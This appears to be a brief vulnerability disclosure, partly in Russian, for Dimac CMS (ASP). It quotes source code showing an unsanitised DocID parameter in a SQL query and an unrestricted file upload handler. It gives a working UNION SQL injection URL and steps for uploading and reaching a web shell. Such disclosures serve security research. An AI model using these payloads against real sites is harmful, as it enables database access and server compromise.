Software: Dimac CMS (asp version)
Software Link: http://dimac.net
Version: >=1.3
SQL-injection
********************
file:
Template1.asp
PHP код:
<!--#include file="../../../GlobalResources/Scripts/GlobalData.asp"-->
<!--#include file="../Scripts/TemplateFunctions.inc"-->
...
Dim vDocId
vDocId = Request.QueryString("DocID").Item
...
file: \SiteResources\data\scripts\
TemplateFunctions.inc
PHP код:
...
'---------------------------------------------
': GetContent
'---------------------------------------------
Function GetContent( xID )
Dim vDocId
Dim Conn, Rs, SQL
Dim dContent, xPos
vDocId = Request.QueryString("DocID").Item
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open GetConStr (GetdbPath)
SQL = "SELECT DocContent FROM Documents WHERE DocumentID=" + xID
Rs.Open SQL, Conn
...
Exploit: Акаунт админа прописывается в конфиге, поэтому только -
host/SiteResources/Data/Templates/Template1.asp?DocID=-1 union select name from MSysObjects
Insecure file upload
********************
Возможность загрузки произвольного файла.
file: \CMSadmin\MediaArchive\images\
UploadProcess.asp
PHP код:
...
FILEFLAG = err.number
on error goto 0
if FILEFLAG = 0 then
ContentType = UploadRequest.Item("inpFile").Item("ContentType")
FilePathName = UploadRequest.Item("inpFile").Item("FileName")
FileName = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
Value = UploadRequest.Item("inpFile").Item("Value")
else
FileName = ""
end if
xPath = Server.MapPath("..\..\..\SiteResources\Data\images\") + "\" + FileName
...
Exploit: Грузим веб-шелл по адресу
host/CMSadmin/MediaArchive/images/upload.asp. Смотрим здесь -
host/SiteResources/Data/images/_webshell_name_
Dimac CMS
Линейный вид
